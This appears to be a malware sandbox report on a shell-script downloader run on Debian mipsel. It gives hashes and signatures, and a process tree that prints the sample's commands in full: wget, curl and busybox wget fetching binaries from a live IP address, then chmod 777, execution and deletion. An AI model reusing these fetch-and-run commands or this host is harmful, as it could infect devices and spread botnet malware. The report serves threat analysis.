Analysis
-
max time kernel
132s -
max time network
136s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipsel image:debian9-mipsel-20240226-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:38
Static task
static1
Behavioral task
behavioral1
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh
-
Size
10KB
-
MD5
b2db94a95f3a12911c7e79383b2e9f18
-
SHA1
17b862a1f3cda3d5cbfb97bc0bcbd640f72f4fd3
-
SHA256
62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c
-
SHA512
3b76d645c8332a5801de9ec5563c4376494571a0736d91e22743912fb8c2b2b3670146be65fa21f4b9a8a080d77960aa2f96e6a437a5f58f219da6c0e23f36c6
-
SSDEEP
192:HfsfQf5fkfMfaLD/WzzdGflUflcflNflQflcflLVzDwrSaqbNhxoZluTFhm9l+I5:/WClO2aLD/WzzdG6mLiKNPZxhxoZluT4
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
File opened for reading: /proc/sys/crypto/fips_enabled (process: curl)
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh/tmp/62b56e0ce47e5f3e31d54a00af53dda8eb3cf7013c1169b5ed29d3ab6d6b954c.sh1⤵PID:697
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:711
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:723
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:734
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:738
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:740
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:753
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:771
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:783
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:793
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:806
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:812
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:820
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:846
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:860
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:866
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:872
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:878
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:884
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:890
-
-
/bin/chmodchmod 777 XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/XyZdblDqLyEULjRaeONlljVYqcQOHReoK9./XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm XyZdblDqLyEULjRaeONlljVYqcQOHReoK92⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:896
-
-
/bin/chmodchmod 777 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo./0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm 0qeATs3VvdbXy5q2rYe9HCtokyMGTLlnQo2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:902
-
-
/bin/chmodchmod 777 DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O./DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm DcFP0ofEig8nZM18u3warEhXLk5xYHKe7O2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:908
-
-
/bin/chmodchmod 777 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi./8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm 8UsUrwuYA2iUiUfPKW69iHjcxKtJRs8jKi2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:914
-
-
/bin/chmodchmod 777 ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue./ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm ixQeW9m16tKueJZ50MJEydyRMmqUbjBvue2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:920
-
-
/bin/chmodchmod 777 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl./7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 7ePPZtONVIw0TMiXaaq4XvkoAoA5Wu8ECl2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:926
-
-
/bin/chmodchmod 777 tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt./tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm tcsqkCxE2m9VT40RbZ1lx2xPQjTx3iqGTt2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:932
-
-
/bin/chmodchmod 777 ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/ty9CGjUMchjT6W6sUlasID6Bvx335HuBb9./ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm ty9CGjUMchjT6W6sUlasID6Bvx335HuBb92⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:938
-
-
/bin/chmodchmod 777 bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg8./bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm bA2Adkblaci5yPXPvWpF1Xkhp3f4fiiSg82⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:944
-
-
/bin/chmodchmod 777 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq./2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm 2SnPGlGst506V0Fo3tb3A7XpdyEM9oAWoq2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:950
-
-
/bin/chmodchmod 777 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq./31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm 31DWSuP5u14uMrq6Y60X1WRMWjOXvN5vSq2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:956
-
-
/bin/chmodchmod 777 PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z./PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm PQ3se6eCXi7n1lt0vxeI31g3Q6mZVKvJ8z2⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:962
-
-
/bin/chmodchmod 777 cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y./cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm cSCiZVl9bGKtX49lwfmwOQ346eQkE5n73y2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:968
-
-
/bin/chmodchmod 777 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/454cMOdzouNcZgCP0raVamPmDNLroMiGgU./454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm 454cMOdzouNcZgCP0raVamPmDNLroMiGgU2⤵PID:971
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97